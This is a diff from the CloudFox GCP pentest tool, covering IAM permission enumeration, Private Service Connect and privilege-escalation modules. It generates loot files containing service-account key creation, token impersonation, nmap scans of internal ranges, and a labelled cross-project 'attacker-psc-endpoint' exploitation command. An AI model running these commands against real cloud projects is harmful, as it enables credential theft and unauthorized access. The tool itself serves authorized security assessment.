globals.GCP_PERMISSIONS_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Unique permissions: %d | Inherited: %d | Cross-project: %d | High-privilege: %d", + len(uniquePerms), inheritedCount, crossProjectCount, highPrivCount), globals.GCP_PERMISSIONS_MODULE_NAME) + + if len(m.GroupInfos) > 0 { + groupsEnumerated := 0 + for _, gi := range m.GroupInfos { + if gi.MembershipEnumerated { + groupsEnumerated++ + } + } + logger.InfoM(fmt.Sprintf("Found %d group(s), enumerated membership for %d", len(m.GroupInfos), groupsEnumerated), globals.GCP_PERMISSIONS_MODULE_NAME) + + unenumeratedGroups := len(m.GroupInfos) - groupsEnumerated + if 
unenumeratedGroups > 0 { + logger.InfoM(fmt.Sprintf("[WARNING] Could not enumerate membership for %d group(s) - permissions inherited via these groups are NOT visible!", unenumeratedGroups), globals.GCP_PERMISSIONS_MODULE_NAME) + } + } + + m.writeOutput(ctx, logger) +} + +// enumerateOrganizationBindings tries to get organization-level IAM bindings +func (m *PermissionsModule) enumerateOrganizationBindings(ctx context.Context, logger internal.Logger) { + orgsSvc := orgsservice.New() + + if len(m.ProjectIDs) > 0 { + iamSvc := IAMService.New() + + bindings, err := iamSvc.PoliciesWithInheritance(m.ProjectIDs[0]) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not get inherited policies: %v", err), globals.GCP_PERMISSIONS_MODULE_NAME) + } + return + } + + for _, binding := range bindings { + if binding.ResourceType == "organization" { + m.mu.Lock() + m.OrgBindings = append(m.OrgBindings, binding) + // Track org IDs + if !contains(m.OrgIDs, binding.ResourceID) { + m.OrgIDs = append(m.OrgIDs, binding.ResourceID) + m.OrgNames[binding.ResourceID] = binding.ResourceID // Use ID as name for now + } + m.mu.Unlock() + } else if binding.ResourceType == "folder" { + m.mu.Lock() + m.FolderBindings[binding.ResourceID] = append(m.FolderBindings[binding.ResourceID], binding) + m.mu.Unlock() + } + } + + if len(m.OrgBindings) > 0 { + logger.InfoM(fmt.Sprintf("Found %d organization-level IAM binding(s)", len(m.OrgBindings)), globals.GCP_PERMISSIONS_MODULE_NAME) + } + + totalFolderBindings := 0 + for _, bindings := range m.FolderBindings { + totalFolderBindings += len(bindings) + } + if totalFolderBindings > 0 { + logger.InfoM(fmt.Sprintf("Found %d folder-level IAM binding(s) across %d folder(s)", totalFolderBindings, len(m.FolderBindings)), globals.GCP_PERMISSIONS_MODULE_NAME) + } + } + + _ = orgsSvc +} + +func contains(slice []string, item string) bool { + for _, s := range slice { + if s == item { + return true + } + } + 
return false +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *PermissionsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating permissions in project: %s", projectID), globals.GCP_PERMISSIONS_MODULE_NAME) + } + + iamService := IAMService.New() + entityPerms, groupInfos, err := iamService.GetAllEntityPermissionsWithGroupExpansion(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_PERMISSIONS_MODULE_NAME, + fmt.Sprintf("Could not enumerate permissions in project %s", projectID)) + return + } + + var explodedPerms []ExplodedPermission + for _, ep := range entityPerms { + for _, perm := range ep.Permissions { + isHighPriv := isHighPrivilegePermission(perm.Permission) + + exploded := ExplodedPermission{ + Entity: ep.Entity, + EntityType: ep.EntityType, + EntityEmail: ep.Email, + Permission: perm.Permission, + Role: perm.Role, + RoleType: perm.RoleType, + ResourceScope: fmt.Sprintf("%s/%s", perm.ResourceType, perm.ResourceID), + ResourceScopeType: perm.ResourceType, + ResourceScopeID: perm.ResourceID, + ResourceScopeName: m.getScopeName(perm.ResourceType, perm.ResourceID), + IsInherited: perm.IsInherited, + InheritedFrom: perm.InheritedFrom, + HasCondition: perm.HasCondition, + Condition: perm.Condition, + EffectiveProject: projectID, + ProjectName: m.GetProjectName(projectID), + IsHighPrivilege: isHighPriv, + } + + // Parse condition title if present + if perm.HasCondition && perm.Condition != "" { + exploded.ConditionTitle = parseConditionTitle(perm.Condition) + } + + // Detect cross-project access + if ep.EntityType == "ServiceAccount" { + parts := strings.Split(ep.Email, "@") + if len(parts) == 2 { + saParts := strings.Split(parts[1], ".") + if len(saParts) >= 1 { + saProject := 
saParts[0] + if saProject != projectID { + exploded.IsCrossProject = true + exploded.SourceProject = saProject + } + } + } + } + + explodedPerms = append(explodedPerms, exploded) + } + } + + m.mu.Lock() + m.ExplodedPerms = append(m.ExplodedPerms, explodedPerms...) + m.EntityPermissions = append(m.EntityPermissions, entityPerms...) + m.GroupInfos = append(m.GroupInfos, groupInfos...) + + // Generate loot + for _, ep := range entityPerms { + m.addEntityToLoot(ep) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Exploded %d permission entries in project %s", len(explodedPerms), projectID), globals.GCP_PERMISSIONS_MODULE_NAME) + } +} + +func (m *PermissionsModule) getScopeName(scopeType, scopeID string) string { + switch scopeType { + case "project": + return m.GetProjectName(scopeID) + case "organization": + if name, ok := m.OrgNames[scopeID]; ok { + return name + } + return scopeID + case "folder": + return scopeID // Could be enhanced to lookup folder names + default: + return scopeID + } +} + +func parseConditionTitle(condition string) string { + // Try to extract title from condition if it looks like a struct + if strings.Contains(condition, "title:") { + parts := strings.Split(condition, "title:") + if len(parts) > 1 { + titlePart := strings.TrimSpace(parts[1]) + if idx := strings.Index(titlePart, " "); idx > 0 { + return titlePart[:idx] + } + return titlePart + } + } + return "" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *PermissionsModule) initializeLootFiles() { + m.LootMap["permissions-commands"] = &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP Permissions Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *PermissionsModule) addEntityToLoot(ep IAMService.EntityPermissions) { + // Only add service accounts with high-privilege permissions + hasHighPriv := false + var highPrivPerms []string + + for _, perm 
:= range ep.Permissions { + if isHighPrivilegePermission(perm.Permission) { + hasHighPriv = true + highPrivPerms = append(highPrivPerms, perm.Permission) + } + } + + if ep.EntityType == "ServiceAccount" { + if hasHighPriv { + m.LootMap["permissions-commands"].Contents += fmt.Sprintf( + "# Service Account: %s [HIGH PRIVILEGE]\n"+ + "# High-privilege permissions: %s\n"+ + "# Roles: %s\n", + ep.Email, + strings.Join(highPrivPerms, ", "), + strings.Join(ep.Roles, ", "), + ) + } else { + m.LootMap["permissions-commands"].Contents += fmt.Sprintf( + "# Service Account: %s\n"+ + "# Roles: %s\n", + ep.Email, + strings.Join(ep.Roles, ", "), + ) + } + + m.LootMap["permissions-commands"].Contents += fmt.Sprintf( + "gcloud iam service-accounts describe %s --project=%s\n"+ + "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n"+ + "gcloud iam service-accounts get-iam-policy %s --project=%s\n"+ + "gcloud iam service-accounts keys create ./key.json --iam-account=%s --project=%s\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n\n", + ep.Email, ep.ProjectID, + ep.Email, ep.ProjectID, + ep.Email, ep.ProjectID, + ep.Email, ep.ProjectID, + ep.Email, + ) + } +} + +// isHighPrivilegePermission checks if a permission is considered high-privilege +func isHighPrivilegePermission(permission string) bool { + for _, prefix := range highPrivilegePermissionPrefixes { + if strings.HasPrefix(permission, prefix) { + return true + } + } + return false +} + +// PermFederatedIdentityInfo contains parsed information about a federated identity +type PermFederatedIdentityInfo struct { + IsFederated bool + ProviderType string // AWS, GitHub, GitLab, OIDC, SAML, Azure, etc. 
+ PoolName string + Subject string + Attribute string +} + +// parsePermFederatedIdentity detects and parses federated identity principals +func parsePermFederatedIdentity(identity string) PermFederatedIdentityInfo { + info := PermFederatedIdentityInfo{} + + // Check for principal:// or principalSet:// format + if !strings.HasPrefix(identity, "principal://") && !strings.HasPrefix(identity, "principalSet://") { + return info + } + + info.IsFederated = true + + // Extract pool name if present + if strings.Contains(identity, "workloadIdentityPools/") { + parts := strings.Split(identity, "workloadIdentityPools/") + if len(parts) > 1 { + poolParts := strings.Split(parts[1], "/") + if len(poolParts) > 0 { + info.PoolName = poolParts[0] + } + } + } + + // Detect provider type based on common patterns + identityLower := strings.ToLower(identity) + + switch { + case strings.Contains(identityLower, "aws") || strings.Contains(identityLower, "amazon"): + info.ProviderType = "AWS" + case strings.Contains(identityLower, "github"): + info.ProviderType = "GitHub" + case strings.Contains(identityLower, "gitlab"): + info.ProviderType = "GitLab" + case strings.Contains(identityLower, "azure") || strings.Contains(identityLower, "microsoft"): + info.ProviderType = "Azure" + case strings.Contains(identityLower, "okta"): + info.ProviderType = "Okta" + case strings.Contains(identityLower, "bitbucket"): + info.ProviderType = "Bitbucket" + case strings.Contains(identityLower, "circleci"): + info.ProviderType = "CircleCI" + case strings.Contains(identity, "attribute."): + info.ProviderType = "OIDC" + default: + info.ProviderType = "Federated" + } + + // Extract subject if present + // Format: .../subject/{subject} + if strings.Contains(identity, "/subject/") { + parts := strings.Split(identity, "/subject/") + if len(parts) > 1 { + info.Subject = parts[1] + } + } + + // Extract attribute and value if present + // Format: .../attribute.{attr}/{value} + if strings.Contains(identity, 
"/attribute.") { + parts := strings.Split(identity, "/attribute.") + if len(parts) > 1 { + attrParts := strings.Split(parts[1], "/") + if len(attrParts) >= 1 { + info.Attribute = attrParts[0] + } + if len(attrParts) >= 2 { + // The value is the specific identity (e.g., repo name) + info.Subject = attrParts[1] + } + } + } + + return info +} + +// formatPermFederatedInfo formats federated identity info for display +func formatPermFederatedInfo(info PermFederatedIdentityInfo) string { + if !info.IsFederated { + return "-" + } + + result := info.ProviderType + + // Show subject (specific identity like repo/workflow) if available + if info.Subject != "" { + result += ": " + info.Subject + } else if info.Attribute != "" { + result += " [" + info.Attribute + "]" + } + + // Add pool name in parentheses + if info.PoolName != "" { + result += " (pool: " + info.PoolName + ")" + } + + return result +} + +// formatCondition formats a condition for display +func formatPermissionCondition(hasCondition bool, condition, conditionTitle string) string { + if !hasCondition { + return "No" + } + + if conditionTitle != "" { + return conditionTitle + } + + // Parse common patterns + if strings.Contains(condition, "request.time") { + return "[time-limited]" + } + if strings.Contains(condition, "resource.name") { + return "[resource-scoped]" + } + if strings.Contains(condition, "origin.ip") || strings.Contains(condition, "request.origin") { + return "[IP-restricted]" + } + if strings.Contains(condition, "device") { + return "[device-policy]" + } + + return "Yes" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Single unified table with all permissions + header := []string{ + "Scope Type", + "Scope ID", + "Scope Name", + "Entity Type", + "Identity", + "Permission", + "Role", + "Custom Role", + "Inherited", + "Inherited From", + "Condition", + 
"Cross-Project", + "High Privilege", + "Federated", + } + + var body [][]string + for _, ep := range m.ExplodedPerms { + isCustom := "No" + if ep.RoleType == "custom" || strings.HasPrefix(ep.Role, "projects/") || strings.HasPrefix(ep.Role, "organizations/") { + isCustom = "Yes" + } + + inherited := "No" + if ep.IsInherited { + inherited = "Yes" + } + + inheritedFrom := "-" + if ep.IsInherited && ep.InheritedFrom != "" { + inheritedFrom = ep.InheritedFrom + } + + condition := formatPermissionCondition(ep.HasCondition, ep.Condition, ep.ConditionTitle) + + crossProject := "No" + if ep.IsCrossProject { + crossProject = fmt.Sprintf("Yes (from %s)", ep.SourceProject) + } + + highPriv := "No" + if ep.IsHighPrivilege { + highPriv = "Yes" + } + + // Check for federated identity + federated := formatPermFederatedInfo(parsePermFederatedIdentity(ep.EntityEmail)) + + body = append(body, []string{ + ep.ResourceScopeType, + ep.ResourceScopeID, + ep.ResourceScopeName, + ep.EntityType, + ep.EntityEmail, + ep.Permission, + ep.Role, + isCustom, + inherited, + inheritedFrom, + condition, + crossProject, + highPriv, + federated, + }) + } + + // Sort by scope type (org first, then folder, then project), then entity, then permission + scopeOrder := map[string]int{"organization": 0, "folder": 1, "project": 2} + sort.Slice(body, func(i, j int) bool { + if body[i][0] != body[j][0] { + return scopeOrder[body[i][0]] < scopeOrder[body[j][0]] + } + if body[i][4] != body[j][4] { + return body[i][4] < body[j][4] + } + return body[i][5] < body[j][5] + }) + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "permissions", + Header: header, + Body: body, + }, + } + + // Log findings + highPrivCount := 0 + crossProjectCount := 0 + for _, ep := range m.ExplodedPerms { + 
if ep.IsHighPrivilege { + highPrivCount++ + } + if ep.IsCrossProject { + crossProjectCount++ + } + } + + if highPrivCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d high-privilege permission entries!", highPrivCount), globals.GCP_PERMISSIONS_MODULE_NAME) + } + if crossProjectCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d cross-project permission entries!", crossProjectCount), globals.GCP_PERMISSIONS_MODULE_NAME) + } + + output := PermissionsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Determine output scope - use org if available, otherwise fall back to project + var scopeType string + var scopeIdentifiers []string + var scopeNames []string + + if len(m.OrgIDs) > 0 { + scopeType = "organization" + for _, orgID := range m.OrgIDs { + scopeIdentifiers = append(scopeIdentifiers, orgID) + if name, ok := m.OrgNames[orgID]; ok && name != "" { + scopeNames = append(scopeNames, name) + } else { + scopeNames = append(scopeNames, orgID) + } + } + } else { + scopeType = "project" + scopeIdentifiers = m.ProjectIDs + for _, id := range m.ProjectIDs { + scopeNames = append(scopeNames, m.GetProjectName(id)) + } + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + scopeType, + scopeIdentifiers, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PERMISSIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/privateserviceconnect.go b/gcp/commands/privateserviceconnect.go new file mode 100644 index 00000000..774a742d --- /dev/null +++ b/gcp/commands/privateserviceconnect.go @@ -0,0 +1,482 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + networkendpointsservice "github.com/BishopFox/cloudfox/gcp/services/networkEndpointsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal 
"github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPrivateServiceConnectCommand = &cobra.Command{ + Use: "private-service-connect", + Aliases: []string{"psc", "private-endpoints", "internal-endpoints"}, + Short: "Enumerate Private Service Connect endpoints and service attachments", + Long: `Enumerate Private Service Connect (PSC) endpoints, private connections, and service attachments. + +Private Service Connect allows private connectivity to Google APIs and services, +as well as to services hosted by other organizations. + +Security Relevance: +- PSC endpoints provide internal network paths to external services +- Service attachments expose internal services to other projects +- Private connections (VPC peering for managed services) provide access to Cloud SQL, etc. +- These can be used for lateral movement or data exfiltration + +What this module finds: +- PSC forwarding rules (consumer endpoints) +- Service attachments (producer endpoints) +- Private service connections (e.g., to Cloud SQL private IPs) +- Connection acceptance policies (auto vs manual) + +Output includes nmap commands for scanning internal endpoints.`, + Run: runGCPPrivateServiceConnectCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type PrivateServiceConnectModule struct { + gcpinternal.BaseGCPModule + + PSCEndpoints []networkendpointsservice.PrivateServiceConnectEndpoint + PrivateConnections []networkendpointsservice.PrivateConnection + ServiceAttachments []networkendpointsservice.ServiceAttachment + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type PrivateServiceConnectOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PrivateServiceConnectOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PrivateServiceConnectOutput) LootFiles() []internal.LootFile { 
return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPPrivateServiceConnectCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, "private-service-connect") + if err != nil { + return + } + + module := &PrivateServiceConnectModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + PSCEndpoints: []networkendpointsservice.PrivateServiceConnectEndpoint{}, + PrivateConnections: []networkendpointsservice.PrivateConnection{}, + ServiceAttachments: []networkendpointsservice.ServiceAttachment{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *PrivateServiceConnectModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, "private-service-connect", m.processProject) + + totalFindings := len(m.PSCEndpoints) + len(m.PrivateConnections) + len(m.ServiceAttachments) + + if totalFindings == 0 { + logger.InfoM("No private service connect endpoints found", "private-service-connect") + return + } + + logger.SuccessM(fmt.Sprintf("Found %d PSC endpoint(s), %d private connection(s), %d service attachment(s)", + len(m.PSCEndpoints), len(m.PrivateConnections), len(m.ServiceAttachments)), "private-service-connect") + + // Count high-risk findings + autoAcceptCount := 0 + for _, sa := range m.ServiceAttachments { + if sa.ConnectionPreference == "ACCEPT_AUTOMATIC" { + autoAcceptCount++ + } + } + if autoAcceptCount > 0 { + logger.InfoM(fmt.Sprintf("[High] %d service attachment(s) auto-accept connections from any project", autoAcceptCount), "private-service-connect") + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m 
*PrivateServiceConnectModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking private service connect in project: %s", projectID), "private-service-connect") + } + + svc := networkendpointsservice.New() + + // Get PSC endpoints + pscEndpoints, err := svc.GetPrivateServiceConnectEndpoints(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, "private-service-connect", + fmt.Sprintf("Could not get PSC endpoints in project %s", projectID)) + } + + // Get private connections + privateConns, err := svc.GetPrivateConnections(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, "private-service-connect", + fmt.Sprintf("Could not get private connections in project %s", projectID)) + } + + // Get service attachments + attachments, err := svc.GetServiceAttachments(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, "private-service-connect", + fmt.Sprintf("Could not get service attachments in project %s", projectID)) + } + + m.mu.Lock() + m.PSCEndpoints = append(m.PSCEndpoints, pscEndpoints...) + m.PrivateConnections = append(m.PrivateConnections, privateConns...) + m.ServiceAttachments = append(m.ServiceAttachments, attachments...) 
+ + for _, endpoint := range pscEndpoints { + m.addPSCEndpointToLoot(endpoint) + } + for _, conn := range privateConns { + m.addPrivateConnectionToLoot(conn) + } + for _, attachment := range attachments { + m.addServiceAttachmentToLoot(attachment) + } + m.mu.Unlock() +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *PrivateServiceConnectModule) initializeLootFiles() { + m.LootMap["private-service-connect-commands"] = &internal.LootFile{ + Name: "private-service-connect-commands", + Contents: "# Private Service Connect Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n" + + "# NOTE: These are internal IPs - you must be on the VPC network to reach them\n\n", + } +} + +func (m *PrivateServiceConnectModule) addPSCEndpointToLoot(endpoint networkendpointsservice.PrivateServiceConnectEndpoint) { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "## PSC Endpoint: %s (Project: %s, Region: %s)\n"+ + "# Network: %s, Subnet: %s\n"+ + "# Target Type: %s, Target: %s\n"+ + "# State: %s, IP: %s\n\n"+ + "# Describe forwarding rule:\n"+ + "gcloud compute forwarding-rules describe %s --region=%s --project=%s\n\n", + endpoint.Name, endpoint.ProjectID, endpoint.Region, + endpoint.Network, endpoint.Subnetwork, + endpoint.TargetType, endpoint.Target, + endpoint.ConnectionState, endpoint.IPAddress, + endpoint.Name, endpoint.Region, endpoint.ProjectID, + ) + + if endpoint.IPAddress != "" { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "# Scan internal endpoint (from within VPC):\n"+ + "nmap -sV -Pn %s\n\n", + endpoint.IPAddress, + ) + } +} + +func (m *PrivateServiceConnectModule) addPrivateConnectionToLoot(conn networkendpointsservice.PrivateConnection) { + reservedRanges := "-" + if len(conn.ReservedRanges) > 0 { + reservedRanges = strings.Join(conn.ReservedRanges, ", ") + } + accessibleServices := "-" + if 
len(conn.AccessibleServices) > 0 { + accessibleServices = strings.Join(conn.AccessibleServices, ", ") + } + + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "## Private Connection: %s (Project: %s)\n"+ + "# Network: %s, Service: %s\n"+ + "# Peering: %s\n"+ + "# Reserved Ranges: %s\n"+ + "# Accessible Services: %s\n\n"+ + "# List private connections:\n"+ + "gcloud services vpc-peerings list --network=%s --project=%s\n\n", + conn.Name, conn.ProjectID, + conn.Network, conn.Service, + conn.PeeringName, + reservedRanges, + accessibleServices, + conn.Network, conn.ProjectID, + ) + + // Add nmap commands for each reserved range + for _, ipRange := range conn.ReservedRanges { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "# Scan private connection range (from within VPC):\n"+ + "nmap -sV -Pn %s\n\n", + ipRange, + ) + } +} + +func (m *PrivateServiceConnectModule) addServiceAttachmentToLoot(attachment networkendpointsservice.ServiceAttachment) { + natSubnets := "-" + if len(attachment.NatSubnets) > 0 { + natSubnets = strings.Join(attachment.NatSubnets, ", ") + } + + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "## Service Attachment: %s (Project: %s, Region: %s)\n"+ + "# Target Service: %s\n"+ + "# Connection Preference: %s\n"+ + "# Connected Endpoints: %d\n"+ + "# NAT Subnets: %s\n", + attachment.Name, attachment.ProjectID, attachment.Region, + attachment.TargetService, + attachment.ConnectionPreference, + attachment.ConnectedEndpoints, + natSubnets, + ) + + if len(attachment.ConsumerAcceptLists) > 0 { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf("# Accept List: %s\n", strings.Join(attachment.ConsumerAcceptLists, ", ")) + } + if len(attachment.ConsumerRejectLists) > 0 { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf("# Reject List: %s\n", strings.Join(attachment.ConsumerRejectLists, ", ")) + } + + // Add IAM bindings info + if 
len(attachment.IAMBindings) > 0 { + m.LootMap["private-service-connect-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range attachment.IAMBindings { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "\n# Describe service attachment:\n"+ + "gcloud compute service-attachments describe %s --region=%s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud compute service-attachments get-iam-policy %s --region=%s --project=%s\n\n", + attachment.Name, attachment.Region, attachment.ProjectID, + attachment.Name, attachment.Region, attachment.ProjectID, + ) + + // If auto-accept, add exploitation command + if attachment.ConnectionPreference == "ACCEPT_AUTOMATIC" { + m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + "# [HIGH RISK] This service attachment accepts connections from ANY project!\n"+ + "# To connect from another project:\n"+ + "gcloud compute forwarding-rules create attacker-psc-endpoint \\\n"+ + " --region=%s \\\n"+ + " --network=ATTACKER_VPC \\\n"+ + " --address=RESERVED_IP \\\n"+ + " --target-service-attachment=projects/%s/regions/%s/serviceAttachments/%s\n\n", + attachment.Region, + attachment.ProjectID, attachment.Region, attachment.Name, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PrivateServiceConnectModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // PSC Endpoints table + if len(m.PSCEndpoints) > 0 { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "Network", + "Subnet", + "IP Address", + "Target Type", + "Target", + "State", + } + var body [][]string + + for _, endpoint := range m.PSCEndpoints { + body = append(body, []string{ + m.GetProjectName(endpoint.ProjectID), + endpoint.ProjectID, + endpoint.Name, + 
endpoint.Region, + endpoint.Network, + endpoint.Subnetwork, + endpoint.IPAddress, + endpoint.TargetType, + endpoint.Target, + endpoint.ConnectionState, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "psc-endpoints", + Header: header, + Body: body, + }) + } + + // Private Connections table + if len(m.PrivateConnections) > 0 { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Network", + "Service", + "Peering Name", + "Reserved Ranges", + "Accessible Services", + } + var body [][]string + + for _, conn := range m.PrivateConnections { + reservedRanges := "-" + if len(conn.ReservedRanges) > 0 { + reservedRanges = strings.Join(conn.ReservedRanges, ", ") + } + accessibleServices := "-" + if len(conn.AccessibleServices) > 0 { + accessibleServices = strings.Join(conn.AccessibleServices, ", ") + } + + body = append(body, []string{ + m.GetProjectName(conn.ProjectID), + conn.ProjectID, + conn.Name, + conn.Network, + conn.Service, + conn.PeeringName, + reservedRanges, + accessibleServices, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "private-connections", + Header: header, + Body: body, + }) + } + + // Service Attachments table - one row per IAM binding + if len(m.ServiceAttachments) > 0 { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "Target Service", + "Accept Policy", + "Connected", + "NAT Subnets", + "IAM Role", + "IAM Member", + } + var body [][]string + + for _, attachment := range m.ServiceAttachments { + natSubnets := "-" + if len(attachment.NatSubnets) > 0 { + natSubnets = strings.Join(attachment.NatSubnets, ", ") + } + + if len(attachment.IAMBindings) > 0 { + // One row per IAM binding + for _, binding := range attachment.IAMBindings { + body = append(body, []string{ + m.GetProjectName(attachment.ProjectID), + attachment.ProjectID, + attachment.Name, + attachment.Region, + attachment.TargetService, + attachment.ConnectionPreference, + fmt.Sprintf("%d", 
attachment.ConnectedEndpoints), + natSubnets, + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row with empty IAM columns + body = append(body, []string{ + m.GetProjectName(attachment.ProjectID), + attachment.ProjectID, + attachment.Name, + attachment.Region, + attachment.TargetService, + attachment.ConnectionPreference, + fmt.Sprintf("%d", attachment.ConnectedEndpoints), + natSubnets, + "-", + "-", + }) + } + } + + tables = append(tables, internal.TableFile{ + Name: "service-attachments", + Header: header, + Body: body, + }) + } + + // Collect loot files - only include if they have content beyond the header + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# NOTE: These are internal IPs - you must be on the VPC network to reach them\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := PrivateServiceConnectOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "private-service-connect") + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go new file mode 100644 index 00000000..f6b5a81b --- /dev/null +++ b/gcp/commands/privesc.go @@ -0,0 +1,191 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + privescservice "github.com/BishopFox/cloudfox/gcp/services/privescService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPrivescCommand = 
&cobra.Command{ + Use: globals.GCP_PRIVESC_MODULE_NAME, + Aliases: []string{"pe", "escalate", "priv"}, + Short: "Identify privilege escalation paths in GCP projects", + Long: `Analyze GCP IAM policies to identify privilege escalation opportunities. + +This module examines IAM bindings to find principals with dangerous permissions +that could be used to escalate privileges within the GCP environment. + +Detected privilege escalation methods include: +- Service Account Token Creation (iam.serviceAccounts.getAccessToken) +- Service Account Key Creation (iam.serviceAccountKeys.create) +- Project/Folder/Org IAM Policy Modification +- Compute Instance Metadata Injection (SSH keys, startup scripts) +- Cloud Functions/Run Deployment with SA Identity +- Cloud Build SA Abuse +- GKE Cluster Access +- Secret Manager Access +- Signed URL/JWT Generation`, + Run: runGCPPrivescCommand, +} + +type PrivescModule struct { + gcpinternal.BaseGCPModule + Paths []privescservice.PrivescPath + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type PrivescOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PrivescOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PrivescOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPPrivescCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PRIVESC_MODULE_NAME) + if err != nil { + return + } + + module := &PrivescModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Paths: []privescservice.PrivescPath{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *PrivescModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PRIVESC_MODULE_NAME, m.processProject) + + if 